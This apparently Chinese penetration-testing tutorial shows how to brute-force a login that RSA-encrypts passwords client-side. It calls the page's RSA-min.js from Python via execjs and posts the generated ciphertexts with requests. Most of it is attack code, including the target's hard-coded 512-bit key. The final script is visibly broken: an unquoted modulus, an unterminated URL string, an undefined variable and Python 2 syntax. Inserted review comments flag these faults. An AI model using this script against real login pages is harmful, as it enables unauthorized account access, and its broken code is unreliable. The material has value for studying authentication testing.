在 Web 渗透测试中,需要对数据进行枚举或爆破时,由于数据经过变换或加密,往往无法借助代理工具快速发送符合要求的数据包。可利用 Python 的 execjs 模块直接调用 JS 文件,生成变换后的数据。

1、一般数据处理

在碰到较简单的数据处理时,如md5,base64等,可直接利用Burp Suite中Intruder模块进行数据处理。

BURP

2、execjs执行js

安装execjs,python -m pip install PyExecJS

import execjs
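def _read_source(path):
    """Return the full text of one JS source file.

    Uses a ``with`` block so the file handle is closed as soon as the read
    finishes (or fails); the original left the handles to the garbage
    collector.
    """
    with open(path, 'r') as f:
        return f.read()


# Three JS sources are loaded and handed to execjs as one script.
# Concatenation order is kept as in the original; whether the files depend
# on each other at load time is not visible here.
encryp = _read_source('encrypt.gzjs')
bigint = _read_source('BigInt.gzjs')
barrett = _read_source('Barrett.gzjs')
# `parser` is the compiled execjs context; its functions are invoked
# through parser.call(...) by the later snippets.
parser = execjs.compile(encryp + bigint + barrett)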

可直接调用js里的函数了

# Call the JS `encrypto` function through the execjs context built in the
# previous snippet (`parser`).  `module` is not defined anywhere in this
# excerpt — presumably the RSA modulus string; confirm against the JS side.
data = parser.call('encrypto', module, 'test')

3、账号暴力破解

在进行某网站用户名密码暴力破解测试的时候,发现其密码被加密。

userName=test&language=1&actionType=umlogin&userIpMac=&authorization=0d6745d0035718d640bc6a3d363a3221e44f9101255e1bb286a3bccb489481fbdf01b36fd45e737c1cf866cf0687fd33f666148395d265aaf78f05a3ccf27135&redirectUrl=

通过查看源代码发现其使用RSA加密

<script type="text/javascript" src="RSA-min.js"></script>

依次调用了RSAKeyPair和encryptedString函数

<script language="JavaScript">
// Grab the first form on the page (shared by every handler below) and force
// the language field to 1.
var form = document.forms[0];form.language.value = 1;
// NOTE(review): the value was set to 1 on the line above, so this branch
// can never run as written; it only widens three buttons for language 0.
if(form.language.value == 0){
document.getElementById("changePwd").style.width = '120px';document.getElementById("login").style.width = '120px';document.getElementById("reset").style.width = '120px';}
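/**
 * Read one parameter out of the current page's query string.
 *
 * @param {string} name - parameter name. It is spliced into a RegExp
 *   unescaped, so regex metacharacters in it change the match; the page only
 *   passes literals.
 * @returns {string} the unescape()d value, or "" when the parameter is absent.
 *   The value is returned verbatim — callers that copy it into the form
 *   (e.g. the "redirect" parameter) must not treat it as trusted.
 */
function GetQueryString(name){
var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
// The original had a line break after `return`, so ASI turned it into
// `return;` and `unescape(r[2]);` ran unconditionally — throwing when r was
// null and yielding undefined otherwise. Keyword and value stay on one line.
if(r!=null) return unescape(r[2]);
return "";}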
/**
 * Keyboard handler: the Enter key (code 13) triggers the login submission.
 * @param {number|string} key - key code as delivered by the caller
 */
function input(key){
// Loose comparison kept so a numeric string "13" still matches, as before.
if(key != 13){ return; }
submitValue();}
/**
 * Language-selector handler: turn the page form into a GET "changeLanguage"
 * request and submit it. `obj` is accepted for the inline handler's sake
 * but never read.
 * @param {*} obj - unused
 */
function select(obj){
var f = form;
f.actionType.value = "changeLanguage";
f.method = "get";
f.action = "http://xxx";
f.submit();}
// Page-level state shared by the handlers below: `key` receives the
// RSAKeyPair built in submitValue(); `isLogin` is a one-shot flag that
// blocks a second submission and is never cleared.
var key;var isLogin = 0;
/**
 * Encrypt the password field with a public key embedded in the page and
 * submit the login form. Runs at most once per page load (`isLogin`).
 * setMaxDigits, RSAKeyPair and encryptedString come from RSA-min.js, which
 * is not shown here.
 */
function submitValue(){
if(isLogin == 1){return;}
document.getElementById("userLogining").style.display = "";
document.getElementById("userLogining").innerHTML = "正在登陆中,请稍候......";
// Public exponent "010001" (65537), empty private exponent, and a
// 128-hex-digit (512-bit) modulus hard-coded in the page.
// NOTE(review): a 512-bit RSA modulus is far below current minimums, and the
// form posts over plain http (see form.action below), so a captured
// ciphertext can simply be re-sent — nothing visible ties it to a nonce or
// session. Client-side encryption here is not a substitute for TLS. Whether
// encryptedString applies any padding is not visible in this excerpt.
setMaxDigits(130);
key = new RSAKeyPair("010001", "", "e464da7f77fe86d25e80917f56146148c78b53bfed06abd619f595cfc4e502aa03f74c208644c2c3c137caaed9a3721f53af1a9b79f54913b8a356a2e294a22b");
var pwd = form.password.value;form.actionType.value = "umlogin";
form.authorization.value = encryptedString(key, pwd);
// The `redirect` query parameter is copied into the form verbatim; the
// server side should validate it before redirecting.
form.redirectUrl.value = GetQueryString("redirect");
form.action = "http://xxx";isLogin = 1;
form.submit();}
/** Clear both credential fields of the page form. */
function resetValue(){
var blank = "";
form.username.value = blank;
form.password.value = blank;}
/** Send the page form to the change-password page (action type "umModifyPwPage"). */
function changePassword(){
var f = form;
f.actionType.value = "umModifyPwPage";
f.submit();}
</script>

我们可以直接在 RSA-min.js 中添加一个函数完成中间过程,这样只需取得最后的结果。

/**
 * Helper appended to RSA-min.js so the whole encrypt step is one call:
 * build the key pair, then return encryptedString() of `data`.
 * The exponent and modulus strings are hex, as the page passes them.
 * @param {string} encryptionExponent - public exponent
 * @param {string} decryptionExponent - private exponent ("" when encrypting only)
 * @param {string} modulus - RSA modulus
 * @param {string} data - plaintext to encrypt
 * @returns {*} whatever encryptedString() returns
 */
function encrypto(encryptionExponent,decryptionExponent,modulus, data){
setMaxDigits(130);
var pair = new RSAKeyPair(encryptionExponent, decryptionExponent, modulus);
return encryptedString(pair, data);
}

最后源码:

import execjs
import requests
# Compile the patched RSA-min.js once; `encrypto` is the helper added to it
# above.  The file handle is left to the garbage collector — a
# `with open(...)` block would close it deterministically.
rsa_js = open('RSA-min.js', 'r').read()
parser = execjs.compile(rsa_js)
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'}
session = requests.Session()
# NOTE(review): as printed, the modulus argument on the next line is not
# quoted and `password` is never defined in this excerpt, so this snippet
# does not parse.  The first argument ('10001') is the public exponent; the
# page's own JS passed "010001".
rsa_data = parser.call('encrypto', '10001', '', e464da7f77fe86d25e80917f56146148c78b53bfed06abd619f595cfc4e502aa03f74c208644c2c3c137caaed9a3721f53af1a9b79f54913b8a356a2e294a22b', password)
data = {'userName' :'test', 'authorization': rsa_data}
# NOTE(review): the URL string literal on the next line is unterminated
# ('http://xxx/ ...).  The request is routed through a local proxy on
# 127.0.0.1:8080 so it can be inspected.
rep = session.post('http://xxx/, data=data, headers=header, proxies={'http': '127.0.0.1:8080'})
# Python 2 print statement; not valid syntax in Python 3.
print rep.content